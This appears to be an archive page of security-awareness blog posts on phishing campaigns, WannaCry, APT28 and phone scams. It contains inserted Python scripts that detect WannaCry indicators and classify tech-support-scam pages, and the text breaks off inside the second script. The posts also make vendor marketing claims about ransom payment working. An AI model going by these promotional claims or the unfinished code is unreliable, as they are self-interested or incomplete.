Archive for Security Awareness Training

Scam of the Week: Department of Motor Vehicles Warns Drivers About Traffic Ticket Phishing

Online reporter Doug Olenick at SC Media was the first to point to a press release from the NY State Department of Motor Vehicles warning about a phishing scam targeting New York drivers, telling them they have 48 hours to pay a fine or have their driver’s license revoked. This may happen in your state as well, so this is your heads-up.

The NY DMV alerted motorists that the scam is just bait to entice them to click on a “payment” link that will in turn infect their workstation with malware. The DMV does not know how many people have been affected, but Owen McShane, director of investigations at New York State DMV, said calls came in from New York City, Albany and Syracuse.

Olenick was able to get a bit more detail: “The malware being dropped came in two categories. The first simply placed a tracking tool on the victim’s computer to see what websites were visited; and the second, more nefarious, attempted to acquire a variety of personally identifiable information, such as names, Social Security numbers, date of birth and credit card information.”

There are several social engineering red flags that show the email is a scam. The supplied links lead to sites without an ny.gov URL, and the state would never make such a request in the first place. Here is how the phishing email reads:

[Image: License_Phish-Example.png]

“The Department of Motor Vehicles does not send emails urging motorists to pay traffic tickets within 48 hours or lose your license,” said Terri Egan, DMV deputy executive commissioner, in a statement.

McShane noted that this scam is similar to one that hit the state about 18 months ago. The DMV, he said, is often used as bait in phishing attacks. Most previous attacks only lasted for 24 to 48 hours and this attack seems to have wrapped up too at this point, he added. This means that the bad guys may have moved on to other states with this attack, so…

I suggest you send employees, friends and family an email about this Scam Of The Week. Obviously, an end-user who was trained to spot social engineering red flags like this would have thought before they clicked.

Learn More about Security Awareness training for your entire company.


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training


Scam of the Week: Massive DocuSign Phishing Attacks

DocuSign has admitted they were the victim of a data breach that has led to massive phishing attacks which used exfiltrated DocuSign information. Ouch. So here is your Scam Of The Week.

They discovered the data breach when DocuSign customers were targeted with phishing campaigns on May 9, 15, and 17. They are now advising customers to filter or delete any emails with subject lines like:

  • Completed: [domain name] – “Wire transfer for recipient-name Document Ready for Signature”
  • Completed [domain name/email address] – “Accounting Invoice [Number] Document Ready for Signature”
  • Subject: “Legal acknowledgement for [recipient username] Document is Ready for Signature”

The campaigns all have Word docs as attachments, and use social engineering to trick users into activating Word’s macro feature, which will download and install malware on the user’s workstation. DocuSign warned that more campaigns are highly likely in the future. Here is an example; these emails look very real:

[Image: DocuSign_Example_Phishing_Email.png]

I suggest you send the following to your employees, friends, and family. You’re welcome to copy, paste, and/or edit:

“Hackers have stolen the customer email database of DocuSign, the company that allows companies to electronically sign documents. These criminals are now sending phishing emails that look exactly like the real DocuSign ones, but they try to trick you into opening an attached Word file and click to enable editing.

But if you do that, malware may be installed on your workstation. So if you get emails that look like they come from DocuSign and have an attachment, be very careful. If there is any doubt, pick up the phone and verify before you electronically sign any DocuSign email. Remember: Think Before You Click.”

See How Sentree Systems, Corp. can Help!!

Learn More!


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


[Alert] WannaCry Ransomware Attack Uses NSA 0-Day Exploits To Go On Worldwide Rampage

NHS Ransomware Attack

This screenshot is just one example: The IT systems of around 40 National Health System hospitals across the UK were affected by this ransomware attack. Non-emergency operations have been suspended and ambulances are being diverted as a result of the infection. Cybersecurity experts have long used the phrase “where bits and bytes meet flesh and blood,” which signifies a cyberattack in which someone is physically harmed.

Mikko Hypponen, chief research officer at the Helsinki-based cybersecurity company F-Secure, called the attack “the biggest ransomware outbreak in history.” This is a cyber pandemic caused by a ransomware weapon of mass destruction. In the Jan 3 issue of CyberheistNews, we predicted that 2017 would be the year where we’d see a ransomworm like this. Unfortunately, it’s here.

Banks, Trains and Automobiles

Hundreds of thousands of machines are infected worldwide, including FedEx Corp, Renault, Nissan, the German Railways, Russian banks, gas stations in China, and Spanish telecommunications firm Telefonica (which reported 85% of their systems being down as a result of the cyberattack). In a case of poetic justice, Russia seems to have been hit the hardest up to now. The source is Kaspersky’s Securelist; note that these are just the early days, and their visibility is likely limited.

[Image: wannacry_03.png]

The strain is called “Wana Decrypt0r” and demands $300 from victims to decrypt their computers. This monster has infected hundreds of thousands of systems in more than 150 countries. Monday morning, when people get back to work, these numbers will only go up. Check out an early animated map created by the NYTimes.

Here is an infection map based on data from MalwareTech.com:

[Image: Wana_Infection_Map.png]

…and the Wall Street Journal also created an infographic explaining the spread of Wana, which is nice to show to management when you ask for more IT security budget to train your users – which would prevent this whole mess.

[Image: WSJ_Wana_Info.png]

Bleepingcomputer said: “Whoever is behind this ransomware has invested heavy resources into Wana Decrypt0r’s operations. In the few hours this ransomware has been active, it has made many high-profile victims all over the world.” “Affected machines have six hours to pay up and every few hours the ransom goes up,” said Kurt Baumgartner, the principal security researcher at security firm Kaspersky Lab. “Most folks that have paid up appear to have paid the initial $300 in the first few hours.”

Despite the fact that this strain is hyper-aggressive, the criminals behind the code do not seem to be all that sophisticated: they are using only a limited number of static bitcoin wallets. It could even be that they are relative newbies at ransomware, and that the NSA worm code has run amok, scaring the daylights out of them for fear of being caught.

The Ransom Deadline Is Short

The ransom starts at $300 for the first 6 hours, and you’ve got up to 3 days to pay before it doubles to $600. If you don’t pay within a week then the ransomware threatens to delete the files altogether. Note the social engineering aspect here too: a sense of urgency is created to prompt people into action. A sense of hope is granted by virtue of the ability to decrypt a sample selection of the files.

The ransomware’s name is WCry, but it is also referenced online under various names, such as WannaCry, WannaCrypt0r, WannaCrypt, or Wana Decrypt0r. As everybody keeps calling it “Wana Decrypt0r,” this is the name we’ll use in this article, but all are the same thing, which is version 2.0 of the lowly and unimpressive WCry ransomware that first appeared in March.

Kaspersky Lab also reports that the Wana strain has numerous languages available and was designed to affect multiple countries.

[Image: wana-decrypt0r-2_0.png]

Sky News Technology Correspondent Tom Cheshire described the attack as “unprecedented”. The ransomware uses the ETERNALBLUE and DOUBLEPULSAR exploits, originally NSA 0-days, which were made public earlier this year by a group calling itself the ShadowBrokers. Patches are available, but many have not applied them yet.

Former U.S. intelligence contractor turned whistleblower Edward Snowden pointed the finger at the NSA, implying the agency was responsible for exploiting a weakness in Windows. It is not clear yet how the ShadowBrokers first got their hands on the NSA tools – conspiracy theories range from a contractor leak to Russian counter-espionage trying to hint that American intelligence should back off.

The group ShadowBrokers first appeared in August, claiming it had stolen tools from the Equation Group, a legendary espionage operation rumored to be affiliated with the NSA. The Brokers announced they had the tools and offered to auction them off, which did not get very far. In January, the group gave up, only to resurface in April, dumping EternalBlue and other Windows hacking tools into the public domain, where criminal hackers were grateful recipients.

The Initial Infection Vector Is A Well-crafted Phishing Email.

According to CrowdStrike’s vice president of intelligence Adam Meyers, the initial spread of WannaCry is coming through phishing, in which fake invoices, job offers and other lures are being sent out to random email addresses. The emails carry a password-protected .zip file and use social engineering to persuade the victim to unlock the attachment with the supplied password; once the contents are clicked, that initiates the WannaCry infection. Microsoft confirms this in a blog post.

But the most concerning aspect of WannaCry is its use of the worm-like EternalBlue exploit. “This is a weapon of mass destruction, a WMD of ransomware. Once it gets into an unpatched PC it spreads like wildfire,” CrowdStrike’s Meyers told Forbes. “It’s going through financials, energy companies, healthcare. It’s widespread.”

“We encourage all Americans to update your operating systems and implement vigorous cybersecurity practices at home, work, and school,” the U.S. Department of Homeland Security said in a statement released late Friday. “We are actively sharing information related to this event and stand ready to lend technical support and assistance as needed to our partners, both in the United States and internationally.” Here is a technical deep dive into the Wana malware.

If You Can, Apply This Patch Immediately.

After the initial infection, the malware spreads like a worm via SMB, the Server Message Block protocol used by Windows machines to communicate with file systems over a network. According to Cisco’s TALOS team:

The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption.

From what we have been able to learn, Wana spreads through SMB, so when we’re talking about machines behind firewalls being impacted, it implies that ports 139 and 445 are open and at-risk hosts are listening for inbound connections. It would only take one machine behind the firewall to become infected to then put all other workstations and servers at risk, because it is a true worm.

In the meantime, harden yourselves against this Windows Network Share vulnerability: ensure that all systems are fully patched with the “MS17-010” security update (link below), and remind all staff to Think Before They Click when they receive any out-of-the-ordinary emails. https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Redmond Issues Emergency Patch For WinXP

Microsoft has also released out-of-band patches for older versions of Windows to protect against Wana, because the original patch did not include XP/Win8. “This decision was made based on an assessment of this situation, with the principle of protecting our customer ecosystem overall, firmly in mind,” the company told customers in a blog post.

Besides installing these out-of-band updates — available for download from here — Microsoft also advises companies and users to outright disable the SMBv1 protocol, as it is an old and outdated protocol, already superseded by newer versions such as SMBv2 and SMBv3. You can use Group Policy for clients and servers. Here is a script to check the complete Active Directory for systems that are missing the WanaCry-related hotfixes.

Here is how to remove SMBv1 on Windows 10:

[Image: Turn_Off_SMB.png]

And here is how to turn it off on Windows Servers. Start with those…

[Image: SMBV1_win_server.png]

Another option: use DSC to enforce the SMBv1 removal. If you don’t have DSC in place, you can use DSC locally on your servers as well. You can now download security updates for Windows Server 2003 SP2 x64, Windows Server 2003 SP2 x86, Windows XP SP2 x64, Windows XP SP3 x86, Windows XP Embedded SP3 x86, Windows 8 x86, and Windows 8 x64.

A Honeypot Server Got Infected With WanaCry 6 Times In 90 Minutes

Like the original, the second variant is automatically executed by the “Microsoft Security Center (2.0) Service” and tries to spread by creating SMB connections to random IP addresses, both internal and external.

According to an experiment carried out by a French security researcher who goes online by the name of Benkow, WanaCry infected the honeypot a mere three minutes after it was reset, showing the aggressive nature of the ransomware’s scanning module, which helps it spread to new victims. Noteworthy: three minutes is about the same amount of time it takes IoT malware to infect a vulnerable home router left connected to the Internet without patches.

How To Detect The Presence Of Wana And SMBv1 Servers On Your Network

One of the easiest ways to monitor what is happening on your network is to set up a SPAN/mirror port or use a network TAP. This will give you access to flows and packet payloads so you can see who is connecting to what and whether there is anything suspicious moving around. Check out this blog post if you use Cisco switches; it explains how you can monitor multiple network segments without the need to remember what is connected to which switch port. If you don’t use Cisco switches, there is an excellent resource on the Wireshark wiki site which looks at how to set up monitoring on other switches.

There is one caveat though: this infection moves out like lightning from patient zero, and all vulnerable machines are literally locked in less than two minutes, so monitoring alone would not be enough to stop this monster. Here is a video showing a machine on the left infected with the MS17-010 worm, spreading WCry ransomware to the machine on the right in real time.

There Are Four Things To Watch Out For When It Comes To Detecting Wana

  1. Check for SMBv1 use
  2. Check for an increase in the rate of file renames on your network
  3. Check for any instances of the file @Please_Read_Me@.txt on your file shares
  4. Check for any instances of files with these extensions:
    • .wnry
    • .wcry
    • .wncry
    • .wncryt
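
As an added example that is not part of the original post, the following Python script implements items 2 to 4 of the list above against a mounted share and a file-server audit log: it walks the share for @Please_Read_Me@.txt and the four extensions, and flags any client whose rename rate spikes inside a sliding window. The audit-log line format, the host names and the sample share contents are constructed assumptions; item 1 (SMBv1 in use) is a host-configuration check and is not covered here.

```python
import os
import re
import tempfile
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Indicators named in the post: the ransom note dropped on shares and the
# extensions the encryptor appends to files it has locked.
RANSOM_NOTE = "@Please_Read_Me@.txt"
WANA_EXTENSIONS = {".wnry", ".wcry", ".wncry", ".wncryt"}

# Assumed (constructed) audit-log format, one event per line:
#   <ISO-8601 UTC timestamp> host=<client> op=<RENAME|WRITE|...> src=<path> dst=<path|->
# Real file-server audit logs differ; adapt the regex to yours.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) op=(?P<op>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+)$"
)


def scan_share(root):
    """Walk a mounted share; return (paths of ransom notes, Counter of Wana extensions seen)."""
    notes = []
    ext_hits = Counter()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name == RANSOM_NOTE:
                notes.append(os.path.join(dirpath, name))
            ext = os.path.splitext(name)[1].lower()  # the strain writes .WNCRY in upper case
            if ext in WANA_EXTENSIONS:
                ext_hits[ext] += 1
    return notes, ext_hits


def parse_events(lines):
    """Parse audit lines into (timestamp, host, op, src, dst); non-matching lines are skipped."""
    events = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["host"], m["op"], m["src"], m["dst"]))
    return events


def rename_bursts(lines, window_seconds=60, threshold=10):
    """Flag hosts whose peak rename count inside any sliding window reaches the threshold.

    Returns {host: (peak_renames_in_window, renames_to_a_wana_extension)}.
    A user renames a handful of files per hour; an encryptor renames hundreds per minute.
    """
    stamps = defaultdict(list)
    wana_renames = Counter()
    for ts, host, op, _src, dst in parse_events(lines):
        if op != "RENAME":
            continue
        stamps[host].append(ts)
        if os.path.splitext(dst)[1].lower() in WANA_EXTENSIONS:
            wana_renames[host] += 1
    alerts = {}
    for host, times in stamps.items():
        times.sort()
        peak, start = 0, 0
        for end, ts in enumerate(times):
            while ts - times[start] > timedelta(seconds=window_seconds):
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[host] = (peak, wana_renames[host])
    return alerts


# Constructed sample audit log: one user doing ordinary work, one workstation encrypting a share.
SAMPLE_AUDIT_LINES = [
    "2017-05-12T09:12:41Z host=WS-0007 op=RENAME src=/docs/draft.docx dst=/docs/final.docx",
    "2017-05-12T09:40:02Z host=WS-0007 op=WRITE src=/docs/final.docx dst=-",
    "2017-05-12T09:58:10Z host=WS-0007 op=RENAME src=/docs/old.txt dst=/docs/archive/old.txt",
] + [
    f"2017-05-12T10:00:{i:02d}Z host=WS-0042 op=RENAME src=/docs/file{i}.xlsx dst=/docs/file{i}.xlsx.WNCRY"
    for i in range(12)
] + [
    "2017-05-12T10:00:15Z host=WS-0042 op=WRITE src=/docs/@Please_Read_Me@.txt dst=-",
]


def build_sample_share():
    """Create a throwaway directory tree that looks like a share after infection (constructed)."""
    root = tempfile.mkdtemp(prefix="wana_demo_")
    os.makedirs(os.path.join(root, "finance"))
    for rel in ("finance/q1.xlsx.WNCRY", "finance/budget.docx.WNCRY",
                "finance/note.wnry", "readme.txt", RANSOM_NOTE):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("constructed sample\n")
    return root


if __name__ == "__main__":
    notes, hits = scan_share(build_sample_share())
    print("ransom notes:", notes)
    print("encrypted-file extensions:", dict(hits))
    print("rename bursts:", rename_bursts(SAMPLE_AUDIT_LINES))
```

Point `scan_share` at the mount point of each file share and feed `rename_bursts` the rename events your file server already audits; a host that shows up in both is your patient zero candidate.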

If Your Network Has Been Infected, What To Do?

This ransomware strain cannot be decrypted with free tools. Research shows the encryption is done with RSA-2048. That means that decryption will be next to impossible, unless the coders have made a mistake that has not been found yet.

Your best bet is to recover from backups, and if your backup failed or does not exist, try a program like Shadow Explorer to see whether the ransomware failed to properly delete your Shadow Volume Copies. If a user did not click Yes at the UAC prompt, then there is a chance those are still available to start the recovery. Here is how to recover files and folders using Shadow Volume Copies. As a last resort, if all backups have failed, you could decide to pay and get the files decrypted. It appears to work.

[Image: uac-prompt.png]

What Can Be Done To Stop These Bad Guys?

It’s possible but difficult. The money has reportedly been flooding into hackers’ accounts, and investigators can track the money and see where the bitcoin ends up. “Despite what people tend to think, it’s highly traceable,” Clifford Neuman, who directs the University of Southern California’s Center for Computer Systems Security, told the Washington Post.

However, hackers are still able to hide and launder the bitcoins in many different ways. Investigators will also examine the code itself as hackers often leave identifiable traces of their work. You can watch as some of these wallets are receiving money in real time.

Here Are 8 Things To Do About It (apart from having weapons-grade backups)

  1. Check your firewall configuration and make sure no criminal network traffic is allowed out, and disable SMBv1 on all machines immediately
  2. From here on out with any ransomware infection, wipe the machine and re-image from bare metal
  3. If you have no Secure Email Gateway (SEG), get one that does URL filtering and make sure it’s tuned correctly
  4. Make sure your endpoints are patched religiously, OS and 3rd Party Apps
  5. Make sure your endpoints and web-gateway have next-gen, frequently updated (a few hours or shorter) security layers
  6. Identify users that handle sensitive information and enforce some form of higher-trust authentication (like 2FA)
  7. Review your internal security Policies and Procedures, specifically related to financial transactions to prevent CEO Fraud
  8. Deploy new-school security awareness training, which includes simulated social engineering tests via multiple channels, not just email.


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News, Tech Tips for Business Owners


French Presidential Candidate Target Of Russian Hacker Phishing Attack

The French presidential election has been hit with a case of déjà vu. Emmanuel Macron’s campaign said its staff received phishing emails meant to steal their passwords.

Trend Micro said in a report set to be published today that they have found evidence of a phishing attack targeting French presidential candidate Emmanuel Macron. The emails and fake sites could have tricked campaign staff into entering their credentials and allowed malware to infect their computers, their researchers stated.

[Image: Candidate_Macron_campaign_phishing_attack.png]

Macron, of the relatively new “En Marche” party, which translates to “on the move”, will be in a runoff on May 7 against National Front candidate Marine Le Pen for the French presidency. Macron’s campaign confirmed to the Wall Street Journal that its staffers received emails leading to fraudulent websites, but that the attempts were blocked; who knows if they really were.

The hacking group behind the phishing attempts was Russian APT28, a group tracked for years by many security researchers. This group of criminal hackers is also known as Pawn Storm, Sofacy, Strontium and Fancy Bear, and SecureWorks calls them “IRON TWILIGHT”. Here is a backgrounder on APT28.

As part of the attack, hackers set up multiple internet addresses that mimicked those of the campaign’s own servers in an attempt to lure Mr. Macron’s staffers into turning over their network passwords, said Feike Hacquebord, a senior threat researcher for Tokyo-based Trend Micro and the author of the report, a copy of which was reviewed by The Wall Street Journal.

Security researchers state it is highly likely APT28 is supported by the Russian Government, specifically the GRU, which is the Russian military intelligence arm, the counterpart of the FSB (former KGB). APT28 “active measures” tried to influence the U.S. presidential election, and at the moment they are trying to do the same thing in France and Germany. Kremlin spokespeople deny everything vehemently. Yeah, sure.

What to do about It

SecureWorks recommends the following excellent best practices to prevent network compromise:

  1. Apply best-practice security controls such as regular vulnerability scanning and patching.
  2. Have network monitoring tools in place.
  3. Educate users to reduce your susceptibility to compromise.
  4. Implement two-factor authentication (2FA) on internal and third-party webmail platforms.
  5. Encourage employees to use 2FA on their personal accounts.
  6. Restrict work-related communication from personal email.

Get Your Security Audit Today, Tomorrow Could be Too Late!!!

Did you know that the average breach goes undetected for more than 200 days?


Get Your Data Security Audit


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


This Week’s Top “In The Wild” Phishing Attacks

And here are this week’s Top 10 “In The Wild” phishing attacks that we received from our customers by employees clicking the Phish Alert Button and sending the email to us for analysis.

We “defang” these attacks and have them updated real-time in a campaign that customers can run regularly to test employees against the “real thing”.

[Image: In_The_Wild_Phishing_Attacks.png]

  • “Chase/JP Morgan: Online Access Restricted” – Spoofed bank email asks users to click malicious link to restore account access.
  • “WhatsApp: Missed Voicemail Notification” – Fake WhatsApp voicemail notification delivers malicious link.
  • “Uber: Update Your Account” – Fake Uber software update notification invites users to click malicious link.
  • “Sharepoint Security Alert – Action Required” – Spoofed Sharepoint email asks users to click malicious link to restore account access.
  • “ShareFile/Citrix: Urgent Info regarding your Sharefile Portal” – Fake Sharefile email offers malicious link for users to click.
  • “NatWest: You sent a payment of 2939.00 GBP to Best EBuyer Limited” – Spoofed bank email offers details on an alleged payment via a malicious link.
  • “De-activation of Email In Process” – Users are required by fake IT admin email to click a malicious link in order to preserve account.
  • “Payoff Authorization” – Email delivers malicious attachment presented as a mortgage payoff authorization.
  • “VAT Return and Payment Overdue” – Fake VAT return and payment form delivered as attachment to a spoofed bank email.
  • “FW: Confidential” – “Confidential” notification tells user to click a malicious link or open an HTML attachment to obtain a “secure” message.

Note that these have made it through all the filters and into the inbox of the employee. That is one of the reasons we continue to remind IT pros that creating a human firewall is an essential last line of defense which you cannot do without.

Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school Security Awareness Training doesn’t hack it anymore. More than ever, your users are the weak link in your network security. Get a product demonstration of the innovative KnowBe4 Security Awareness Training Platform. In this live one-on-one demo we will show you how you can:

  • NEW: Access to the world’s largest library of security awareness training.
  • NEW: Social Engineering Indicators technology turns every simulated phishing email into a tool you can use to instantly train employees.
  • Send simulated phishing tests and drive down the Phish-prone percentage.
  • Advanced features: EZXploit™ automated “human pentest” and USB Drive Test™.
  • Active Directory integration allows you to easily upload and manage users.
  • Reporting to watch your Phish-prone percentage drop, with great ROI.


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


Ransomware Causes 90-day Downtime And 700K Damages For Law Firm Who Then Sues Their Insurer

[Image: Moses_Afonso_Ryan_Ltd.png]

PROVIDENCE, R.I. — Cybercriminals held a Providence law firm hostage for months by encrypting its files and demanding $25,000 in ransom paid in Bitcoin to restore access, according to a lawsuit filed in U.S. District Court.

Moses Afonso Ryan Ltd. is suing its insurer, Sentinel Insurance Co., for breach of contract and bad faith after it denied its claim for lost billings over the three-month period the documents were frozen by the ransomware infection.

According to the lawsuit, during the time their files were inaccessible, the firm’s 10 lawyers were left unproductive and inefficient — amounting to $700,000 in lost billings.

After paying the Bitcoins, the firm then had to re-negotiate those terms after the initial key to decrypt their files failed to work. They had to purchase more Bitcoins in exchange for other tools to recover their documents.

Ransomware Develops Into “Valet Thievery” Driven By Phishing Attacks

Attackers are tailoring their demands to their victims, in essence making it a brand of “valet thievery,” said cyber expert Doug White, director of forensics, applied networking and security at Roger Williams University. They might demand $800 from a household, and push that sum into the thousands if they realize they’ve hit a law firm or hospital, White said. The key to the infections is phishing attacks that use social engineering to trick an employee into opening a malicious attachment.

It’s a crime, too, that is vastly underreported, law enforcement agencies say. “The shame of it keeps it from being reported,” White said, as businesses don’t want to sully their image or reveal weakness. “Usually they just pay them off. It’s the cost of doing business.”

Moses Afonso Ryan Ltd. is not alone in falling victim to such a crippling attack. Police departments, town halls, law firms, accounting firms and individuals have been hit across Rhode Island, according to Capt. John C. Alfred, head of the Rhode Island State Police cyber-crimes unit.

Protecting a network involves everyone in it from a janitor to the CEO

“I never tell anyone to buy the ransomware key because it’s sponsoring illegal activity,” Alfred said. He added: “You have to back-up the data beforehand. That’s what you have to do. You’re not going to get that data back. Even if you pay, you might not get the key.” Protecting a network involves everyone in it from a janitor to the CEO, he added.

Dana M. Horton, representing Sentinel Insurance in the lawsuit, also did not immediately respond to an email and a phone call seeking comment. The company has not yet filed a response in U.S. District Court.

White questioned whether the law firm’s suit would succeed, saying it would “open a giant can of poison worms” for the insurance industry. Alfred, too, emphasized that cyber security insurance is a growing field. “Everybody is going to be insuring their data,” Alfred said.

Heads-Up: Cyber insurance Does Not Pay Out For Human Error

You need to read the fine print in your cyber insurance policy if you have one, or if you are negotiating one. These policies normally do not cover incidents caused by human error, they only pay out for software-related vulnerabilities. This is a gotcha you need to be aware of, because your organization might have a false sense of security.

Capt. John C. Alfred, head of the Rhode Island State Police cyber-crimes unit, is right. You do need to step all employees through new-school security awareness training, from the mail room to the board room!

Full story at Providence Journal.

Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


Northrop Grumman Can Make a Stealth Bomber – but Falls for W-2 Phishing Attack

America was the victim of 34 percent of global ransomware infections in 2016, while only being 4.4 percent of the world’s population.

The “why” is clear; a whopping 64 percent of Americans are willing to pay to get their files back, as opposed to only 34 percent of victims worldwide, per Symantec’s 2017 Internet Security Threat Report.

Surprisingly, Symantec’s results show paying ransom doesn’t guarantee universal results as just 47 percent of global victims who paid up in 2016 reported getting their files back, which is in direct contradiction with our own experience, where we helped dozens of victims with a 95% successful return of all their files.

Note, these were organizations at their wit’s end who found us on the internet and needed help to get their files back after an employee opened an infected attachment, not existing KnowBe4 customers calling us about our Ransomware Guarantee.

Newly discovered ransomware families jumped last year from 30 in 2015 to 101 in 2016. The number of new variants of existing ransomware code, however, dipped. “It suggests that more attackers are opting to start with a clean slate by creating a new family of ransomware rather than tweaking existing families by creating new variants,” the report said.

Consumer infections at home accounted for 69 percent, but Symantec found that some attackers are executing more sophisticated attacks against businesses, where they silently penetrate the network, move laterally and then encrypt all machines at the same time.

The ransoms themselves also skyrocketed, climbing 266 percent last year, from an average of 294 dollars in 2015 to 1,077 dollars in 2016 helped by a Bitcoin price which is over 1,300 dollars at the time of this writing. The report also showed that attackers have begun customizing individual ransom demands based on the type of data and the volume of files that were encrypted.

Symantec Report Confirmed by Verizon, SANS and NTT

Verizon’s vendor-neutral 2017 Data Breach Investigations Report (in which KnowBe4 participated as a data source) found that ransomware levels in 2016 were up 50 percent over 2015 figures. Verizon also found that the types of attacks targeting organizations vary from sector to sector. For instance, manufacturing has the lowest median level DDoS level, but the highest level of espionage-related breaches.

The SANS 2016 Threat Landscape survey reported: “Phishing and spearphishing were among the top ways threats enter organizations, which set up a perfect storm for ransomware to blossom. 75% of threats entered via email attachment, 46% malicious link. User education alone is not sufficient. At a corporate level, perimeter protections, including email screening and next-gen firewalls, can reduce the volume of malware that can trip up an end user. From there, the endpoint needs every advantage to remain secure – behavior based malware detection, whitelisting, access control and appropriate network segmentation.”

The growing threat was further confirmed by more research from NTTSecurity, whose 2017 Global Threat Intelligence Report found that 22 percent of all global incident engagements were related to ransomware, more than any other category of attack.

Of the ransomware attacks observed via NTTSecurity’s intelligence network, 77 percent were concentrated among four industries – business and professional services (28 percent), government (19 percent), health care (15 percent), and retail (15 percent).

Half of all incidents affecting health care organizations involved ransomware. “This may indicate that attackers have identified health care institutions as a vulnerable target more willing to pay ransom than other sectors,” their report noted.


Posted in: Monthly Security Brief, Newsletter Topics, Security Awareness Training, Tech News


[Scam Alert] Scam Hooks Victims With a Single Word

'Can You Hear Me?' Scam Hooks Victims With a Single Word

 

Don’t pick up the phone to answer calls from unknown numbers. Instead, let them go to voicemail.

That’s the operational security advice being promulgated to Americans by the U.S. Federal Communications Commission in response to an ongoing series of attacks designed to trick victims into uttering a single word.

The FCC says in a March 27 alert that the scam centers on tricking victims into saying the word “yes,” which fraudsters record and later use to attempt to make fraudulent charges on a person’s utility or credit card accounts.

“The scam begins when a consumer answers a call and the person at the end of the line asks, ‘Can you hear me?’ The caller then records the consumer’s ‘Yes’ response and thus obtains a voice signature,” the FCC warns. “This signature can later be used by the scammers to pretend to be the consumer and authorize fraudulent charges via telephone.”

Fake Tech Support

This isn’t the first time that fraudsters have “weaponized” the telephone.

Scammers have long phoned consumers, pretending to be from a government agency such as the Internal Revenue Service. Another frequent ploy is pretending to be from the support department of a technology firm, such as Microsoft or Facebook, and then trying to get victims to pay for bogus security software meant to fix nonexistent problems on their PC (see Researcher Unleashes Ransomware on Tech-Support Scammers).

Authorities have made some related arrests. Last year, Indian police arrested 70 suspects as part of an investigation into a fake IRS call center scam.

Also last year, the FTC announced a $10 million settlement with a Florida-based tech-support scheme, run by an organization called Inbound Call Experts, also known as Advanced Tech Support. The FTC and the state of Florida said the organization ran “services falsely claiming to find viruses and malware on consumers’ computers.”

Researchers Study Scammers

In a recent paper, “Dial One for Scam: A Large-Scale Analysis of Technical Support Scams,” researchers at the State University of New York at Stony Brook described how the tech-support version of these scams works, as well as how it might be disrupted by targeting the infrastructure on which scammers rely.

Screenshot of a technical support scam that mimics a Windows “blue screen of death” to increase its trustworthiness. (Source: “Dial One for Scam”)

“Scammers use specific words in the content of a scam page to convince the users that their machines are infected with a virus,” the researchers say.

The Stony Brook researchers built a crawler called ROBOVIC (for “robotic victim”). Of the 5 million domains it successfully connected to during a 36-week period beginning in September 2015, it logged 22,000 URLs serving tech-support scams, spread across about 8,700 unique domain names.

But those 22,000 different web pages used a total of only 1,600 phone numbers, of which 90 percent were connected to one of four VoIP services: Bandwidth, RingRevenue, Twilio and WilTel.
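The two findings above, scare wording on the page and a small pool of phone numbers shared across many domains, are the pivots a defender can reuse. The following is an added example, not code from the Stony Brook paper or from this blog, of the analysis step that runs once pages have been fetched: it flags a page when infection-scare wording, a prompt to call and a phone number appear together, then groups flagged URLs by normalized phone number so that one number fronting many domains stands out. The keyword lists are an assumption, not the paper’s lexicon, and the sample pages, domains and numbers are constructed placeholders.

```python
"""Added example: classify fetched pages as tech-support scams and pivot on
the phone numbers they share. Not the ROBOVIC tool; keyword lists and the
sample corpus below are assumptions/constructed for offline use."""
import re
from collections import defaultdict

# Wording that scam pages use to convince visitors they are infected.
# This list is an assumption, not the paper's exact lexicon.
SCARE_TERMS = re.compile(
    r"\b(virus|infected|malware|spyware|trojan|blocked|suspended|security alert|error code)\b",
    re.I,
)
# The call-to-action that turns a scare page into a phone scam.
CALL_TERMS = re.compile(r"\b(call|toll[- ]?free|helpline|support number|dial)\b", re.I)
# North American numbers in the usual written forms: 1-800-555-0101, (800) 555-0101, 800.555.0101
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?(\d{3})\)?[\s.-]?(\d{3})[\s.-]?(\d{4})\b")


def normalize_phone(m):
    """Canonical form so the same number written three ways clusters together."""
    return "1" + "".join(m.groups())


def strip_html(html):
    """Crude tag removal; enough for keyword and number extraction."""
    text = re.sub(r"<script.*?</script>", " ", html, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    return re.sub(r"\s+", " ", text)


def classify_page(html):
    """Return (is_scam, phones). A page is flagged when it carries at least two
    scare terms, a prompt to call, and at least one phone number."""
    text = strip_html(html)
    phones = sorted({normalize_phone(m) for m in PHONE_RE.finditer(text)})
    scare_hits = len(SCARE_TERMS.findall(text))
    is_scam = scare_hits >= 2 and bool(CALL_TERMS.search(text)) and bool(phones)
    return is_scam, phones


def cluster_by_phone(pages):
    """pages: {url: html}. Returns {phone: sorted list of flagged URLs using it}.
    Numbers shared by many URLs are the chokepoint worth reporting to the carrier."""
    clusters = defaultdict(set)
    for url, html in pages.items():
        is_scam, phones = classify_page(html)
        if is_scam:
            for phone in phones:
                clusters[phone].add(url)
    return {phone: sorted(urls) for phone, urls in clusters.items()}


# Constructed sample corpus; every domain and number is a placeholder.
SAMPLE_PAGES = {
    "http://pc-alert.example/warn.html":
        "<html><body><h1>SECURITY ALERT</h1><p>Your computer is INFECTED with a "
        "virus. Do not shut down. Call toll free 1-800-555-0101 now.</p></body></html>",
    "http://win-error.example/bsod.html":
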